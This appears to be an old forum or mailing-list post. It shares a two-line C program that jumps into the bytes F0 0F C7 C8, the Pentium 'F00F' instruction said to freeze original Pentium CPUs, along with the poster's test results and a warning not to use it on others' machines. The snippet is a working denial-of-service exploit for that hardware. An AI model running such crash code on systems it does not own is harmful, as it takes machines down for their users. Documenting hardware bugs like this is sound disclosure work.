Sorry about the suspense. I didn't have a copy of this when I wrote my
previous post.
Here it is:
char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
main () { void (*f)() = x; f(); }
This is alleged to completely lock any "true" Intel Pentium. PentiumII
and the Pentium Pro CPUs are said not to be affected.
I tested it on my Pentium 133MHz and it "worked". My 486DX2 just gives
SIGILL.
Be carefull when running this, it really works! (And don't do this to
anyone else's computer!!)
